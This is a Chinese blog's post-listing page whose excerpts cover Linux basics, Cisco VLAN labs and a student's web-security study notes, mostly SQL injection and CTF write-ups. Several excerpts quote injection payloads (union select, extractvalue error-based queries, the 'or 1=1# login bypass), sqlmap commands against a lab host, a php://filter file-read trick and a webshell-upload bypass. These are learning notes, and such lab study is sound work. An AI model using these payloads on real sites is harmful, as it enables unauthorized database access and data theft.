自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(52)
  • 收藏
  • 关注

原创 关于Chrome-selenium规避检测(window.navigator.webdriver)

【代码】关于Chrome-selenium规避检测(window.navigator.webdriver)

2022-11-22 15:24:23 636 1

原创 Linux 扩展篇 YUM+Shell编程

当它们被双引号“”包含时, $*会将所有的参数作为一个整体,以“$1 $2 …“$n”的形式输出所有参数。(2)搜索 passwd 文件以 root 关键字开头的所有行,并输出该行的第 1 列和第 7 列,中间以“,”号分割。$n (功能描述:n 为数字,$0 代表该脚本名称,$1-$9 代表第一到第九个参数,十以上的参数,十以上的参数需要用大括号包含,如 ${10})(3)只显示/etc/passwd 的第一列和第七列,以逗号分割,且在所有行前面添加列名 user,shell 在最后一行添加"999"。.

2022-08-06 15:04:07 898

原创 Linux 实操篇(CentOS7)

shell:可看作命令解释器 (bin/sh 命令 shell命令入口)uinx解释执行的程序:bourne shell (处理和用户的交互比较差一点) 。后来Linux在此基础上发展出bash shell(bourne again shell)Debian(Linux的一个发行版系列),基于Debian的Ubuntu发行版用的shell解释器名为dash(6.10版本后)CentOS7使用的是bashman 命令 (栗子: man ls)help 命令(只获得shell内嵌命令的帮助信息)

2022-07-12 14:16:25 3014

原创 Linux 基础篇(CentOS)

通过上下左右键来移动光标1、touch text.txt (创建文件text.txt文件)2、vim text.txt(vi/vim为进入vim编辑器命令,意为在vim编辑器中编辑test.txt文件)3、i (i意为insert为输入模式,输入i之后你就可以开始编辑这个txt文件了)4、esc(退出编辑模式)5、:wq (保存并退出(注意:在冒号后面需要加上一个空格,不然linux是不会识别出来的)rm 文件名:带询问删除rm -f 文件名:不带询问删除chmod 000 a.txt

2022-07-06 16:52:12 4229 2

原创 14 WEB漏洞:SQL注入之类型及提交注入

a.数字b.字符c.搜索符4.jsonHTTP头GETPOSTCOOKIEREQUESTJSON注入相关知识$_SERVER(php内置变量,可查询数据包或浏览器信息,可以将查询信息改为sql语句)a. 简介JSON 是存储和交换文本信息的语法,是轻量级的文本数据交换格式。类似xml,但JSON 比 XML 更小、更快,更易解析。所以现在接口数据传输都采用json方式进行。JSON 文本的 MIME 类型是 “application/json”b. JSON语法■ 数据在名称/值对中

2022-07-02 12:32:24 299

原创 正则表达式(正则匹配)

正则表达式

2022-06-29 14:34:02 299

原创 13 WEB漏洞:SQL注入之MYSQL注入

SQL 是一门 ANSI 的标准计算机语言,用来访问和操作数据库系统-。SQL 语句用于取回和更新数据库中的数据。SQL 可与数据库程序协同工作,比如 MS Access、DB2、Informix、MS SQL Server、Oracle、Sybase 以及其他数据库系统。本来有一些基础知识有在sql注入小总里写,现在还是再提一下:information_schema.tables:记录所有表名信息的表information_schema.columns:记录所有列名信息的表table_name:表名

2022-04-29 17:52:35 2117

原创 11-12 WEB漏洞-必懂知识点详解/SQL注入之简要SQL注入

前言:由于信息收集内容比较丰富,包含的知识点比较多,算是很重要的一部分(和实操挂钩),小瑶还没整理好(其实还没太理清,可以收集的信息实在太多,而且收集信息的方法很多简直无法想象)所以先接SQL注入往下写,信息收集等整理好在分享(当然关于信息收集部分,有好的资源可以分享一下哦)<>WEB漏洞:SQL注入:SQL 注入就是在用户输入的字符串中加入 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击

2022-03-25 20:37:54 369

原创 SQL注入小总

又是一个被迫作业,一到周末反而忙死!1.SQL注入把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。2.种类很多,但原理和利用方式几乎都差不太多,掌握一种,其他的可能就比较好学了。(种类百度可能比较方便https://www.cnblogs.com/xuthus/p/9450805.html )做题的话我理解就是先拿到他的库名,然后是表名,再是字段明,然后看字段内容。(通俗一点,每一个库里,可能有很多个表,每个表里有很多的字段,每个字段里都

2022-03-18 23:41:10 650

原创 ospf单区域 远程登录 端口安全

R0:由于r0与pc0连接的端口为fa0/1,所以PC0的网关应该和fa0/1的IP地址保持一致

2022-03-18 16:48:31 370

原创 07基础入门:CDN相关技术

CDN:是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率判断是否存在CDN:超级ping网址:http://ping.chinaz.com/https://ping.aizhan.com/http://ping.aizhan.com/http://ce.cloud.360.cn/nslookup,若目标存在多个IP的话,就很有可能有CDN服务CDN绕过技

2022-03-15 22:25:01 908 2

原创 06 基础入门:加密算法

学习加密算法原因:在渗透测试中,常见的密码等敏感信息会采用加密处理,其中作为安全测试人员必须要了解常见的加密方式,才能为后续的安全测试做好准备。常见加密算法:MD5,SHA,ASC,进制,时间戳,URL,BASE64,Unescape,AES,DES等1.MD5不可逆(只能通过算法加密,不能通过算法解密。其解密方法是通过枚举法。将大量明文加密后与将要解密的密文对照,从而确定其解密结果。)16位和32位,加密字符由A-Z,0-9随机组成2.SHA不可逆。由A-Z,0-9随机组合,SHA1,S

2022-03-14 22:36:59 2527 1

原创 05基础入门:系统及数据库等

学习原因:除去搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取判别操作系统类型:网站路径、大小写、文件在两个系统之间的适用性,兼容性不同判断出操作系统,就可以从不同操作系统所支持的漏洞类型下手。大小写:windows服务器不区分大小写,linux区分大小写。TTL: 不同操作系统的TTL值不同(与那个接近就是哪种操作系统)用IP地址在nmap上判断操作系统命令:nmap -O ip地址

2022-03-12 17:23:17 1667

原创 04基础入门:WEB源码拓展

1.WEB源码作用用来代码审计漏洞,做信息突破口。栗子:获取某ASP源码后可以采用默认数据库下载为突破,获取某其他脚本源码漏洞可以进行代码审计挖掘或分析其业务逻辑等,总之源码的获取将为后期的安全测试提供了更多的思路。2.关于WEB源码目录结构据库配置文件,后台目录,模板目录,数据库目录等index.php 根据文件后缀判定admin 网站后台路径data 数据相关目录install 安装目录member 会员目录template 模板目录(和网站相关的整体架构)data =>

2022-03-08 15:16:54 4968

原创 03基础入门:搭建安全拓展

1.域名IP目录解析安全问题域名解析访问的是目录,ip访问的是域名解析目录的上级目录,它能扫到更多信息。IP地址访问可以发现更多的信息同时经常能找到程序源码备份文件和敏感信息,而域名访问只能发现一个文件夹下的所有文件。2.文件后缀...

2022-03-08 13:18:21 349

原创 02基础入门:数据包拓展

1.HTTP协议是从WEB服务器传输超文本标记语言(HTML)到本地浏览器的传送协议。(最初的目的是为了提供一种发布和接收HTML页面的方法)HTTP是一个基于TCP/IP通信协议来传递数据的协议,传输的数据类型为HTML 文件,、图片文件, 查询结果等。2.HTTP与HTTPS区别:● HTTPS是HTTP协议的安全版本,HTTP协议的数据传输是明文的,是不安全的,HTTPS使用了SSL/TLS协议进行了加密处理。● http和https使用连接方式不同,默认端口也不一样,http是80,ht

2022-03-05 20:53:31 5711

原创 01 基础入门:概念名词

1.域名由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,便设计出了域名,并通过网域名称系统来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。域名注册位置1.Godaddy2.Gandi3.Hover4.Namesilo5.Namecheap6.万网顶级域名 二级域名和多级域名:1.顶级域名:又叫一级域名,一串字符串中间一个点隔开,例如baidu.com。顶级域名是互联网DNS等级之中的最高级的域,它保存于DNS根域的名字

2022-03-05 16:59:33 170

原创 Cisco 三层交换

三层交换实验拓扑:实验目标:1:理解并配置交换机的SVI2:实现三层交换机的VLAN间通信实验步骤∶1:开启三层交换机的路由功能2:配置SW1 上 VLAN2、VLAN3的SVI,并查看端口状态3:使用SVI地址作为PC的网关4:测试VLAN间通信实验配置:1:SW1的基本配置(二层交换机)配置trunk模式SW1 SW22:开启3层交换机的路由功能并创建vlan及命名3:配SW1的交换虚拟按口SVI4配置PC网关5:测试VLAN间通信(部分)...

2022-01-18 19:56:01 715

原创 Cisco Vlan trunk

Vlan trunk实验拓扑:实验目标:1:学会配置 trunk,实现端到端VLAN通信2:配置 trunk流量控制3:修改native VLAN实验步骤∶1:根据拓扑所示,在 SW1、SW2上创建VLAN,并命名2:在SW1、SW2上划分端口至对应的VLAN,并配置PC的IP地址3:使用静态 trunk模式,配置SW1、SW2之间的trunk4:测试端到端VLAN 的通信5:在trunk 上移除VLAN3的流量,使得SW1、SW2之间的VLAN3不能够通信6:在trunk 上允许

2022-01-18 19:51:23 1058

原创 Cisco默认网关远程登录

**配置默认网关远程登陆**实验拓扑:实验目标:1:理解交换机默认VLAN的作用2:理解交换机默认网关的作用3:实现交换机远程管理实验步骤:1:根据拓扑所示,配置对应的IP地址2:配置SW1的管理地址,使其能够被PCO远程管理(3种方法)(1)使用telnet密码登陆:密码: ccna5188$ 特权密码: ccnp@5188(2))使用用户名密码登陆:用户名: ccna密码: ccna5188$(3)无密码登陆3:配置SW1的默认网关,使其能够被PC1远程管理实验配置:1

2022-01-18 19:44:30 1276

原创 bugku网站被黑

这题能两个点根据提示(网站被黑了 黑客会不会留下后门)1.首先尝试使用御剑扫描网站的目录![在这里插入图片描述](https://img-blog.csdnimg.cn/bcda5f9a940e4d2cac8a88ab56eb4846.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAKuWwj-eRtg==,size_20,color_FFFFFF,t_70,gindex.phpshell.

2022-01-10 14:43:52 2353

原创 SQL注入漏洞测试(登录绕过)

写这篇文章是为了帮大家避雷,咱就是说这题就是来骗币的,友友们别上当(浪费3个币的我好想哭)打开是这样直接使用万能密码即可'or 1=1#

2022-01-09 21:05:15 4164

原创 SQL注入漏洞测试(HTTP头注入)

先简单写一下这题的解题步骤,原理在后面在看看提不提吧1.在此页面用bp抓包2.在此修改数据包3.查字段数,4回显正常,5错误 说明是4个字段order by 4order by 54.看回显 union select 1,2,3,4说明回显位在2,3,4,5.查看库名 union select 1,2,3,database()查看表名 union select 1,2,3,group_concat(table_name) from information_schema.tabl

2021-12-12 20:06:58 2168

原创 SQL注入漏洞测试(报错盲注)

1.判断注入类型id=1 回显正常id=1’ and 1=1-- - 回显正常id=1’ and 1=2-- - 回显错误因此,判断为单字符注入2.由于题目是报错盲注所以我们可以尝试使用报错型注入的函数尝试爆库名http://219.153.49.228:43578/new_list.php?id=1’ and extractvalue(1,concat(’~’,(select database())))-- -2.ok,接着爆表名http://219.153.49.228:435

2021-12-11 16:41:34 3160

原创 SQL注入漏洞测试(delete注入)

*首先关于报错型注入可以参考一下*文章了解delecte注入的多种方法这题我使用的是extractvalue函数从此可以知道注入点在删除页面的url链接的id参数中,可由报错注入来爆库1.爆库 (pikaqiu)http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select database())))2.爆表名(message)http://219.153.49.228:48577/

2021-12-09 21:24:30 2878

原创 X-Forwarded-For注入漏洞实战

解题步骤:1.bp抓包(随便登录用户和密码)2.修改X-Forward-For 鼠标右键保存到桌面(命名为*.txt 列如xff.txt)3.使用sqlmap库名 python sqlmap.py -r C:\Users\86191\Desktop\xff.txt --dbs --batch表名 python sqlmap.py -r C:\Users\86191\Desktop\xff.txt -D webcalendar --tables --batch字段 pytho

2021-12-06 19:19:58 875

原创 SQL手工注入漏洞测试(Sql Server数据库)

1.判断注入类型(数字型)2.判断字段数(4个)3.判断回显(2和3) 这里要注意两个点1.使用union all2.字段三的位置是字符4.爆库 (使用db_name()函数查询数据库) mozhe_db_v25.查看表名 xtype=‘u’ :查看用户表mmsql和mysql语法有点不同,mmsql记录敏感信息的表在sysobjects 中具体参数请了解以下链接了解:https://www.cnblogs.com/atree/p/SQL-Server-sysobjects

2021-12-02 20:54:05 492

原创 SQL手工注入漏洞测试(Access数据库)

1.判断注入类型 (数字型)2.判断字段数(4个)3.猜表名 (猜对表名是admin,并且发现回显在2和3)其他猜表名的方法?id=1 and 0<>(select count(*) from 表名)?id=1 and exists (select * from 表名)4.猜字段名(在有回显的位置猜,字段为username passwd)其他方法:?id=1 and exists (select 字段名 from admin)5.md5解密一下...

2021-12-02 19:18:32 562

原创 SQL注入漏洞测试(布尔盲注)

一.sqlmap1.查看库名(测试后发现有5个)python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 --dbs2.查看表明 python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 -D stormgroup --tables3.查看字段名 python sqlmap.py -u http://219.153.49.228:44485/new_

2021-11-30 17:11:29 5313

原创 SQL手工注入漏洞测试(MySQL数据库-字符型)

测试后发现是字符型 4个字段,回显是2和3 ?id=’ union select 1,2,3,4 – -2. 查看库名 ?id=’ union select 1,database(),version(),4 – - mozhe_discuz_stormgroup3.查看表名,测试后发现有两个 notice和stormgroup_member?id=’ union select 1,table_name,version(),4 from information_schema.tables.

2021-11-28 20:57:02 4819

原创 《从0到1:CTFer成长之路》题目 SQL注入-1

一.SQLMap![在这里插入图片描述](https://img-blog.csdnimg.cn/2e18372d86f740ba91ce8e5ba09b1f3b.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAKuWwj-eRtg==,size_20,color_FFFFFF,t_70,g_se,x_164个库2个表一个字段二:手注3个字段,联合注入,回显位在2和3查

2021-11-27 19:58:56 3058

原创 SQL手工注入漏洞测试(MySQL数据库)

1. order by 查字段 字段至少为四2. union select 1,2,3,4 (回显位在2和3)3.查库和版本号 database() version()http://219.153.49.228:44777/new_list.php?id=1%20and%200%20%20%20union%20select%201,database(),version(),4 库名:mozhe_Discuz_StormGroup4.查表名 219.153.49.228:44777/

2021-11-27 17:02:29 2807

原创 小瑶笔记.

希望笔记持续更新======文件包含漏洞出处链接

2021-11-08 19:03:08 72

原创 [极客大挑战 2019]BuyFlag

首先题目打开是这样,我们先尝试抓包

2021-10-25 21:13:31 81

原创 Bugku 本地管理员

首先打开f12看一下源码,可以看到一串base64加密后的字符,解密看一下

2021-10-24 21:27:28 143

原创 Bugku Flask_FileUpload

这道题还是比较好理解的,先f12查看源码,然后源码的大概意思是只能上传png和jpg文件,并且会用python来执行文件。然后用记事本写就欧克,引入import os ,调用cat flag。然后上传文件,在f12就可以看到flag...

2021-10-24 20:43:30 1076

原创 Bugku 文件包含

这题提示了是文件包含,利用php为协议读取文件就好,然后百度一下(推荐这个文),然后选用这个http://127.0.0.1/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名](针对php文件需要base64编码)然后拿到base64一下ok了...

2021-10-23 17:55:50 140

原创 Bugku Simple_SSTI_2

首先打开之后是上面这样,题目有提示是ssti,所以

2021-10-23 17:42:14 2584 1

原创 [BJDCTF2020]Easy MD5

距离上次写wp还是四个月之前,这题打开之后是这样的。我先尝试了sql注入,放 ’ / "什么的都没什么反应,所以试试抓包这是主要代码 select * from ‘admin’ where password=md5($pass,true)这里写了一个md5( ) 函数我们可以看到,我们的raw位置写的是true,由md5()函数可知,此代码会返回16字符的二进制...

2021-10-17 21:55:39 85

原创 Buuctf [ACTF2020 新生赛]Upload

先说本题考点吧:php别名绕过打开是一个灯泡,要我们上传一个文件(文件上传)发现有上传要求我们可以在前端的html中将下图我标记的白色部分删除即可没有要求然后我们开始可以试着上传一个php文件,发现上传php文件会被拦截。这种时候我们可以用burpsuite fuzz一下(不会的在文章最后会给大佬的教程) fuzz后发现phtml类型的文件可以上传文件里我们写一句话木马,和cat flag上传成功后即可看到然后我们url/uplo4d/881d111ef425270b34a18ab8c5762

2021-06-10 20:29:15 434 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除